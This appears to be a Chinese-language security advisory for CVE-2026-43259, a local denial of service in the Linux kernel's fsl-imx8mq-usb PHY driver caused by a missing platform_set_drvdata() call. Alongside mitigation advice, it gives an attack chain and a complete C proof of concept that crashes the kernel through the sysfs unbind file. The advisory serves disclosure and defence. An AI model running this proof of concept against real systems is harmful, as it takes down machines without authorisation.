CVE-2026-43259 CVSS 5.5 中危

CVE-2026-43259: Linux内核fsl-imx8mq-usb驱动拒绝服务漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43259

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的fsl-imx8mq-usb驱动程序存在一个严重的逻辑缺陷。由于在驱动初始化的probe函数中遗漏了对platform_set_drvdata()的调用，导致在驱动卸载的remove函数中调用platform_get_drvdata()获取数据时，无法获取有效的设备私有数据结构。本地低权限攻击者可利用此缺陷触发内核空指针解引用，从而导致系统崩溃或拒绝服务，严重影响系统可用性。

技术细节

该漏洞源于Linux内核源码中drivers/phy/freescale/phy-fsl-imx8mq-usb.c文件的实现错误。在Linux设备驱动模型中，驱动程序通常在probe阶段使用platform_set_drvdata()将设备特定的上下文信息（如寄存器映射、时钟句柄等）存储在device结构体中。然而，该驱动的probe函数直接返回，未执行此保存操作。随后，当驱动被移除或设备断开时，remove函数尝试通过platform_get_drvdata()检索这些数据以进行清理工作（如禁用时钟）。由于数据未被设置，返回的指针为NULL，驱动随即对其进行解引用操作。这将导致内核抛出空指针异常（Oops），进而引发Kernel Panic或系统死锁，导致本地拒绝服务。攻击者只需具备本地低权限即可通过解绑驱动触发该逻辑。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的低权限访问权限。

STEP 2

步骤2

攻击者识别系统中加载了存在漏洞的fsl-imx8mq-usb驱动程序。

STEP 3

步骤3

攻击者向/sys/bus/platform/drivers/目录下的unbind文件写入设备ID，主动触发驱动的remove函数。

STEP 4

步骤4

由于驱动数据未初始化，内核在执行remove逻辑时访问空指针，触发系统崩溃（Kernel Panic）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43259
 * Trigger the remove function of the vulnerable fsl-imx8mq-usb driver.
 * This requires the device to be bound to the driver first.
 * Compilation: gcc poc.c -o poc
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

int main() {
    int fd;
    // The unbind path for the specific driver
    const char *unbind_path = "/sys/bus/platform/drivers/fsl-imx8mq-usb-phy/unbind";
    // The device ID may vary depending on the hardware configuration
    // Common IDs for imx8mq usb phy might look like '382f0000.usbphy'
    const char *device_id = "382f0000.usbphy"; 

    // Check if we are root (usually required for unbind)
    if (getuid() != 0) {
        printf("[!] This PoC typically requires root privileges to write to sysfs.");
        // Attempting anyway as per PR:L (Low Privilege) context, sometimes permissions are loose
    }

    printf("[*] Attempting to unbind driver %s from device %s\n", "fsl-imx8mq-usb-phy", device_id);

    fd = open(unbind_path, O_WRONLY);
    if (fd < 0) {
        perror("[-] Failed to open unbind path");
        printf("[-] Ensure the driver is loaded and the path exists.\n");
        return 1;
    }

    if (write(fd, device_id, strlen(device_id)) < 0) {
        perror("[-] Failed to write to unbind");
        close(fd);
        return 1;
    }

    printf("[+] Triggered driver unbind.\n");
    printf("[+] If the system crashes or hangs, the vulnerability is confirmed.\n");
    
    close(fd);
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

由于漏洞触发需要本地访问权限且涉及内核驱动，建议用户及时关注内核更新通知并应用官方补丁。对于无法立即更新的系统，可以通过禁用该USB PHY驱动模块（blacklist）或严格限制对/sys/bus/platform/目录的访问权限来降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表